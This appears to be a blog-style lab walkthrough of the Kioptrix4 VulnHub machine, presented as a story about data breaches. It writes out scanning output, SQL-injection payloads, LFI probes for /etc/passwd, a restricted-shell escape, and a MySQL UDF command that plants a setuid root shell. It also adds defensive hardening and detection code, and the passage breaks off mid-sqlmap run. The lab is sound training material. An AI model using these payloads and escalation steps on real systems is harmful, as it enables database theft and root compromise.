The Kioptrix4 Story: How Data Breach Happened

This Kioptrix4 story is about how a data breach happens. The problem has become a global issue: although data breaches predate the era of information overload, the trend for the years ahead is increasingly worrying. A superpower such as the United States has seen the number of data breach incidents rise every year from 2004 to 2019 (Figure 1), even though America is the country that started the history of the Internet through DARPA.

Figure 1. Data breach trend 2004 – 2019 in the United States (Source: statista.com)

ISO (the International Organization for Standardization) has published a new standard on protecting against the risk of data breaches, ISO 27040. It belongs to the ISO 27000 family and elaborates on the ISO 27002 standard. In that standard a data breach is defined as a compromise of security that leads to the accidental or unlawful destruction, loss, alteration, unauthorized disclosure of, or access to protected data transmitted, stored or otherwise processed (source: Wikipedia, data breach). In plain terms: any breach of information security that destroys, loses, alters, discloses or gives access to protected data, whether that data is in transit, at rest or being processed.

Indonesia's situation could well be worse than that of the United States; unfortunately no accurate figures exist yet. This is probably because an ecosystem of trust and privacy has not yet been built in the national cyber security industry, so incident data cannot yet be shared.

The Indonesian government, through the Ministry of Communication and Informatics, has responded by strengthening policy: the personal data protection provisions in Government Regulation (PP) No. 71 of 2019 on the Operation of Electronic Systems and Transactions were expanded in Articles 14 to 18. That regulation revises PP No. 82 of 2012. Going further, the Government and Parliament have agreed to deliberate the Draft Law on Personal Data Protection within the 2020 National Legislation Program (Prolegnas).

The philosophy and principles behind these policies are strongly dominated by the GDPR, the General Data Protection Regulation, the data protection regulation enacted in the European Union three years ago, naturally with various adjustments to the situation in Indonesia.

The Kioptrix4 machine (downloadable from VulnHub) gives this article a technical illustration of how credentials stored in a database get stolen. It tells the story of the mindset and techniques a cyber criminal uses to break into data. As in the earlier instalments of this series, the cyber attack story goes through three phases: the Scanning and Enumeration phase, the Mapping Attack Surface phase, and the Exploitation and Post-Exploitation phase. Hopefully this story helps Electronic System Operators keep raising their vigilance. Happy reading.

Scanning and Enumeration Phase

In this phase we gather information about the target with nmap. The -p- option is used to detect every open port that accepts connections, and the -A option identifies applications and the operating system and runs the default scripts. From the information obtained, the Kioptrix4 server is a web server (Apache version 2.2.8) and a file sharing server (Samba version 3.0.28a). For server administration, Kioptrix4 also runs an SSH service (OpenSSH version 4.7p1).

kali@kali:~$ nmap -p- -A 192.168.216.151
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-22 23:26 EDT
Nmap scan report for 192.168.216.151 (192.168.216.151)
Host is up (0.0013s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 9h00m01s, deviation: 2h49m42s, median: 7h00m01s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2020-04-23T06:27:17-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.79 seconds
kali@kali:~$ 

Looking further into the HTTP service, we find several interesting folders and files. The important files to examine are index.php and checklogin.php, which are used by the login form shown in the figure below.

kali@kali:~$ dirb http://192.168.216.151

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Apr 22 23:48:51 2020
URL_BASE: http://192.168.216.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.216.151/ ----
+ http://192.168.216.151/cgi-bin/ (CODE:403|SIZE:330)
==> DIRECTORY: http://192.168.216.151/images/
+ http://192.168.216.151/index (CODE:200|SIZE:1255)
+ http://192.168.216.151/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.216.151/john/
+ http://192.168.216.151/logout (CODE:302|SIZE:0)
+ http://192.168.216.151/member (CODE:302|SIZE:220)
+ http://192.168.216.151/output (CODE:200|SIZE:0)
+ http://192.168.216.151/server-status (CODE:403|SIZE:335)

---- Entering directory: http://192.168.216.151/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.216.151/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Wed Apr 22 23:48:56 2020
DOWNLOADED: 4612 - FOUND: 7
kali@kali:~$

Figure 2. Login form using the checklogin.php script for authentication

Using Burp Suite, we can see that when the login button is pressed, index.php hands the authentication process over to checklogin.php, and that three parameters are involved in that process.

Figure 3. The checklogin script and the parameters myusername, mypassword and Submit.

Testing the mypassword parameter with the probe character " produces the error message shown in Figure 4. This indicates that the parameter is probably vulnerable to SQL Injection.

Figure 4. Error message after the mypassword parameter is given the character "

To verify the suspected SQL Injection vulnerability we use sqlmap. This Python-based tool needs three options to confirm our suspicion: -u for the URL, pointing at checklogin.php; --data, because the form sends its data with the POST method; and -p to name the parameter we want to test, mypassword. Once sqlmap has run, our suspicion turns out to be correct: the mypassword parameter is vulnerable to SQL Injection.

kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=admin&Submit=Login' -p mypassword
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:17:12 /2020-04-23/

[00:17:12] [INFO] testing connection to the target URL
[00:17:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:17:13] [INFO] testing if the target URL content is stable
[00:17:13] [INFO] target URL content is stable
[00:17:13] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[00:17:13] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[00:17:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:17:38] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:17:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:17:38] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
[00:17:42] [INFO] POST parameter 'mypassword' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --code=302)
[00:17:42] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[00:17:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[00:17:42] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[00:17:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[00:17:42] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[00:17:43] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[00:17:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:17:43] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[00:17:43] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:17:43] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[00:17:43] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[00:17:43] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[00:17:43] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[00:17:43] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[00:17:43] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[00:17:43] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[00:17:43] [INFO] testing 'MySQL inline queries'
[00:17:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[00:17:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[00:17:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[00:17:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[00:17:43] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[00:17:43] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[00:17:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[00:17:53] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[00:17:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:17:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:17:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:17:53] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[00:18:02] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1') and/or try to force the back-end DBMS (e.g. '--dbms=mysql')                                                                                                                                                                                   
[00:18:02] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[00:18:03] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') 
[00:18:03] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[00:18:03] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[00:18:03] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[00:18:03] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[00:18:03] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[00:18:03] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[00:18:04] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[00:18:04] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[00:18:04] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[00:18:04] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 321 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=admin' AND (SELECT 6095 FROM (SELECT(SLEEP(5)))CRdG)-- LUNZ&Submit=Login
---
[00:18:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[00:18:10] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.216.151'
[00:18:10] [WARNING] you haven't updated sqlmap for more than 112 days!!!

[*] ending @ 00:18:10 /2020-04-23/

kali@kali:~$ 
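Before moving on, here is the mechanism sqlmap has just confirmed, reduced to a few lines. This is an added example written for this article, not code from the Kioptrix4 machine: an in-memory SQLite table stands in for the MySQL members database (the usernames are the accounts found on the server, the passwords are placeholders), the first function splices the form values into the SQL string the way checklogin.php does, and the second binds them as parameters. The bypass value ' or 1=1-- - from Figure 5 is used rather than sqlmap's #-terminated payload because SQLite does not treat # as a comment.

```python
import sqlite3

# Constructed stand-in for the Kioptrix4 'members' table: the usernames are the
# accounts found above, the passwords are placeholders, not the real ones.
MEMBERS = [
    ("john", "placeholder-john"),
    ("robert", "placeholder-robert"),
    ("loneferret", "placeholder-loneferret"),
]


def make_db():
    """In-memory SQLite database playing the role of the MySQL 'members' DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members (username, password) VALUES (?, ?)", MEMBERS)
    return conn


def check_login_vulnerable(conn, username, password):
    """Same construction as the query in checklogin.php / robert.php: the form
    values are concatenated into the SQL text, so a quote in either value
    rewrites the statement. Returns the matched rows, or None when the
    database rejects the statement (the situation behind the error in Figure 4;
    with SQLite a lone single quote triggers it)."""
    sql = ("SELECT username, password FROM members WHERE username='"
           + username + "' AND password='" + password + "'")
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def check_login_safe(conn, username, password):
    """Hardened form: fixed statement, values bound as parameters. The same
    input is now compared as data, so it matches nothing."""
    sql = "SELECT username, password FROM members WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


def authenticated_user(rows):
    """checklogin.php grants a session whenever the row count is non-zero and
    then shows the first row; this mirrors that decision."""
    return rows[0][0] if rows else None


if __name__ == "__main__":
    db = make_db()
    bypass = "' or 1=1-- -"      # the value from Figure 5 (SQLite accepts -- comments, not #)
    print("vulnerable:", authenticated_user(check_login_vulnerable(db, "john", bypass)))
    print("hardened  :", authenticated_user(check_login_safe(db, "john", bypass)))
```

With the concatenated query the bypass value matches every row and the first one, john, is logged in; with the bound parameters the same value matches nothing. The fix for the PHP on the machine is the same idea: a prepared statement (mysqli or PDO) instead of string concatenation, which also removes the error message of Figure 4 that gave the vulnerability away.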

If we follow up the SQL Injection vulnerability in the mypassword parameter of checklogin.php with the help of Burp Suite, we find one more potential vulnerability: Local File Inclusion (LFI) in the username parameter of member.php. Consider the following figures, based on the exploration with Burp Suite.

Figure 5. Using the value ' or 1=1-- - in the mypassword parameter, after which we are redirected to login_success.php
Figure 6. The login form is bypassed and we are redirected to member.php
Figure 7. Trying the value ' or 1=1-- 1 in the username parameter shows no SQL Injection vulnerability
Figure 8. Supplying the file index.php in the username parameter shows signs of a Local File Inclusion (LFI) vulnerability, but a php extension is appended to the end of the file name
Figure 9. Adding the %00 terminator to drop the appended php extension yields a positive response from the backend
Figure 10. Supplying /etc/passwd%00 yields a positive response, but the contents of the passwd file are not visible yet
Figure 11. Supplying /etc/etc/passwd%00 in the username parameter yields a positive response from the backend and confirms the LFI vulnerability

From tracing the authentication flow that starts at the login form, we find an additional target: a Local File Inclusion (LFI) vulnerability in the username parameter. We also find three user accounts on the Kioptrix4 server: loneferret, john and robert.
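To make the LFI finding concrete from the defender's side, the following is an added example written for this article, not code from the machine: a small model of the include logic the figures above reveal (the .php suffix is appended and a NUL byte cuts the path short, as PHP 5.2 did when it handed the string to the C library), beside a hardened resolver that only accepts an identifier from a fixed allowlist and confines the result to a members directory. The web root /var/www, the members directory and the allowlist are assumptions; the model deliberately does not reproduce the /etc/etc quirk of Figures 10 and 11.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed layout of the Kioptrix4 web root (an assumption, not from the article)
WEB_ROOT = "/var/www"
MEMBERS_DIR = posixpath.join(WEB_ROOT, "members")
# Constructed allowlist of member pages; the names are the accounts found above
ALLOWED_MEMBERS = frozenset({"john", "robert", "loneferret"})
IDENTIFIER = re.compile(r"[a-z][a-z0-9_]{0,31}")


def resolve_include_vulnerable(username):
    """Model of what member.php appears to do: append '.php' to the raw
    parameter and include the result. PHP 5.2 passed the path to a C string
    function, so a NUL byte ended it early, which is why the %00 terminator
    in Figure 9 drops the extension. Returns the path that would be included."""
    path = username + ".php"
    nul = path.find("\x00")
    if nul != -1:
        path = path[:nul]
    return posixpath.normpath(posixpath.join(WEB_ROOT, path))


def resolve_include_safe(username):
    """Hardened resolver: the value must be a short lowercase identifier, must be
    on the allowlist, and the assembled path must stay inside MEMBERS_DIR.
    Returns the path to include, or None to refuse the request."""
    if not isinstance(username, str) or IDENTIFIER.fullmatch(username) is None:
        return None                      # rejects NUL, '/', '.', '%' and friends
    if username not in ALLOWED_MEMBERS:
        return None                      # unknown member page
    candidate = posixpath.normpath(posixpath.join(MEMBERS_DIR, username + ".php"))
    # Defence in depth: even if the identifier check were loosened later, the
    # result may not escape the members directory.
    if posixpath.commonpath([MEMBERS_DIR, candidate]) != MEMBERS_DIR:
        return None
    return candidate


def resolve_from_query(raw_value, resolver):
    """URL-decodes the query value the way the web server does before the
    script sees it (so %00 becomes a real NUL byte), then resolves it."""
    return resolver(unquote(raw_value))


if __name__ == "__main__":
    for value in ("john", "/etc/passwd%00", "..%2Findex"):
        print(repr(value),
              "vulnerable ->", resolve_from_query(value, resolve_include_vulnerable),
              "| safe ->", resolve_from_query(value, resolve_include_safe))
```

Two things stand out when the two resolvers are run side by side. Appending .php is not a control at all once the runtime truncates on NUL, and even on a modern PHP that rejects NUL bytes in paths it does nothing against ../ traversal to another .php file. The allowlist plus path confinement makes the decision independent of how the runtime happens to treat odd bytes, which is the property a reviewer should look for in any include or file-serving code path.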

We continue enumeration on the file sharing service, which runs Samba, using enum4linux to gather information. Probing ports 139 and 445 reveals no shared folders and no information about the user accounts that use the service.

kali@kali:~$ enum4linux -A 192.168.216.151
Unknown option: A
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Apr 23 01:55:01 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.216.151
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ======================================================= 
|    Enumerating Workgroup/Domain on 192.168.216.151    |
 ======================================================= 
[+] Got domain/workgroup name: WORKGROUP

 =============================================== 
|    Nbtstat Information for 192.168.216.151    |
 =============================================== 
Looking up status of 192.168.216.151
        KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
        KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
        KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

        MAC Address = 00-00-00-00-00-00

 ======================================== 
|    Session Check on 192.168.216.151    |
 ======================================== 
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
kali@kali:~$ 

Phase Two: Mapping Attack Surface

From the information gathered in the first phase, we can map the vulnerabilities and the cyber attacks that could be attempted, as shown in Figure 12. On closer examination, every potential attack via Remote Code Execution (RCE) turns out to be invalid. Only two potential attacks are valid and feasible: SQL Injection and Local File Inclusion.

Figure 12. Mapping Attack Surface on the Kioptrix4 server

Phase Three: Exploitation and Post-Exploitation

In the previous phase we identified two vulnerabilities (SQL Injection and Local File Inclusion) that could give us a limited shell on the Kioptrix4 server. In this article we only attack the SQL Injection.

We attack the SQL Injection vulnerability in two ways: first manually, and second automatically with the help of sqlmap.

Manual Way to Attack the SQL Injection

As we know, the mypassword parameter in checklogin.php is vulnerable to SQL Injection, and we have found three valid user accounts (loneferret, john and robert). So we try to bypass the login form for each of the three users. After giving the mypassword parameter the input ' or 1=1-- -, we obtain the credentials of two user accounts, john and robert; loneferret's has not been found yet. This can be seen in the following figures:

Figure 12. Obtaining the credentials of user account john
Figure 13. Obtaining the credentials of user account robert
Figure 14. The credentials of user account loneferret are not obtained yet

Armed with the credentials we obtained, we access the Kioptrix4 server with one of them, john. After logging in, it turns out we are in a restricted shell: we cannot use standard commands such as id or even whoami. To break out of this "restricted shell" we use the command echo os.system("/bin/bash"), and thankfully we obtain a limited shell (Figure 15).

Figure 15. Escaping the restricted shell with echo os.system('/bin/bash')

Looking into the operating system, the Kioptrix4 server turns out to run Ubuntu 8.04 with kernel 2.6.24. Unfortunately the server has no gcc compiler, even though an exploit for that Ubuntu version exists.

We search for the word "password", since a programmer may not have followed secure coding best practice. Using the command find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null, we find such carelessness in the script robert.php, as the following figure shows:

Figure 16. Potential developer carelessness in the file robert.php

Next we examine the file robert.php and find that the MySQL root password is absent, i.e. blank, as the following source code shows:

john@Kioptrix4:/tmp$ cat /var/www/robert/robert.php 
<?php
session_start();
if(!session_is_registered(myusername)){
        header("location:../index.php");
}else{
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

$result=mysql_query("SELECT * FROM $tbl_name WHERE username='".$_SESSION['myusername']."'");

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count!=0){
        $row = mysql_fetch_array($result);
}
else {
echo "Something went wrong";
}

ob_end_flush();

?>

<html><body>
<table width="500" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC">
        <tr>
                <td>
                        <table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF">
                                <tr>
                                        <td align="center"  colspan="3"><strong>Member's Control Panel </strong></td>
                                </tr>
                                <tr>
                                        <td width="30">Username</td>
                                        <td width="6">:</td>
                                        <td width="464"><?php print ($row[1]);?></td>
                                </tr>
                                <tr>
                                        <td width="30">Password</td>
                                        <td width="6">:</td>
                                        <td width="464"><?php print($row[2]);?></td>
                                </tr>
                                <tr>
                                        <td> 
                                        <form method="link" action="logout.php">
                                        <input type=submit value="Logout">
                                        </form>
                                        </td>
                                        <td> </td>
                                </tr>
                        </table>
                </td>
        </tr>
</table>
</body></html>

<?php
}
?>
john@Kioptrix4:/tmp$ 

Next we log in to MySQL as root without a password, and we get into the database as shown in the figure below.

Figure 17. Logging in to MySQL as root with a blank password

This is certainly progress, but we still do not have root privileges. So we check which privileges MySQL runs with, hoping the database runs as root. After running ps aux | grep mysql, that turns out to be the case, as the figure below shows.

Figure 18. The database runs with root privileges

MySQL has a feature called User Defined Functions (UDF) that can be used to run commands on the operating system, which is of course an opportunity to escalate privileges. So we check whether such a function is present in MySQL on the Kioptrix4 server. After verification (Figure 19), it turns out a UDF is installed in the database, and its sys_exec function lets us execute operating system commands, naturally with root privileges.

Figure 19. A UDF is present in MySQL on the Kioptrix4 server

We can therefore execute /bin/sh with root privileges. To do this we copy it from the bin folder to the tmp folder, set its ownership and mark it to run as root. The command run through sys_exec is select sys_exec('cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh'); as shown in the following figure (Figure 20).

Figure 20. Executing the command "cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh" through the sys_exec function

Once that command has run and we execute the copied shell /tmp/sh, we have escalated our privileges to root, as the figure below shows.

Figure 21. Obtaining root privileges on the Kioptrix4 server
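The two conditions that turned database access into root above, mysqld running as root and a setuid copy of sh left in /tmp, are exactly what a hardening review or a post-incident check should look for. The following is an added example, not from the article or the machine: it scans constructed ps aux lines (a sample written for this example, not captured from Kioptrix4) for a mysqld process owned by root, and walks a directory for files carrying the setuid or setgid bit, using a throwaway temporary directory as the sample.

```python
import os
import stat
import tempfile

# Constructed 'ps aux' sample (not captured from the article's machine); only
# the USER column and the COMMAND column are consulted.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2844  1692 ?        Ss   06:20   0:01 /sbin/init
root      4410  0.0  0.0   1716   488 ?        S    06:21   0:00 /bin/sh /usr/bin/mysqld_safe
root      4452  0.0  2.1 127624 17956 ?        Sl   06:21   0:00 /usr/sbin/mysqld --basedir=/usr --user=root
www-data  4520  0.0  0.3  21312  3380 ?        S    06:21   0:00 /usr/sbin/apache2 -k start
john      4811  0.0  0.1   4572  1480 pts/0    S    06:40   0:00 -bash
"""


def mysqld_running_as_root(ps_text):
    """Returns the command lines of mysqld processes owned by root. An empty
    list is the healthy state: the daemon has dropped to an unprivileged user."""
    hits = []
    for line in ps_text.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 10)              # 10 fixed columns, then COMMAND
        if len(fields) < 11:
            continue
        user, command = fields[0], fields[10]
        if user == "root" and os.path.basename(command.split()[0]) == "mysqld":
            hits.append(command)
    return hits


def find_setuid_files(directory):
    """Walks directory and returns (path, mode, uid) for every regular file with
    the setuid or setgid bit set, the trace that 'chmod +s /tmp/sh' leaves."""
    found = []
    for dirpath, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)                     # lstat: do not follow symlinks
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return found


def demo_setuid_scan():
    """Creates a throwaway directory holding one setuid file and one plain file
    and returns the names the scanner flags (expected: ['sh'])."""
    with tempfile.TemporaryDirectory() as tmp:
        suspicious = os.path.join(tmp, "sh")
        harmless = os.path.join(tmp, "notes.txt")
        for path in (suspicious, harmless):
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        os.chmod(suspicious, 0o4755)   # setuid + rwxr-xr-x, as on the article's /tmp/sh
        os.chmod(harmless, 0o644)
        return sorted(os.path.basename(p) for p, _mode, _uid in find_setuid_files(tmp))


if __name__ == "__main__":
    for cmd in mysqld_running_as_root(SAMPLE_PS):
        print("mysqld runs as root:", cmd)
    print("setuid files flagged in sample dir:", demo_setuid_scan())
```

On a real host the second function would be pointed at /tmp, /var/tmp and /dev/shm, the world-writable directories where a planted setuid binary has no business being. The database-side counterpart of the first check is SELECT name, dl FROM mysql.func; which lists registered UDFs, so a sys_exec row there corresponds to what Figure 19 shows. The fix for the process finding is to run mysqld under a dedicated unprivileged account (user = mysql in my.cnf), and the fix for the blank root password in robert.php is a dedicated database account with a real password and only the SELECT rights the page needs; with both in place, a UDF can no longer hand out a root shell.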

Automatic Way to Attack the SQL Injection

Given the earlier analysis that the mypassword parameter in checklogin.php is vulnerable, we first gather some information, starting with the users in the database (the --users option):

kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=pass&Submit=Login' -p mypassword --technique=B --users  
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:40:46 /2020-04-23/

[08:40:46] [INFO] resuming back-end DBMS 'mysql' 
[08:40:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
---
[08:40:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[08:40:46] [INFO] fetching database users
[08:40:46] [INFO] fetching number of database users
[08:40:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:40:46] [INFO] retrieved: 
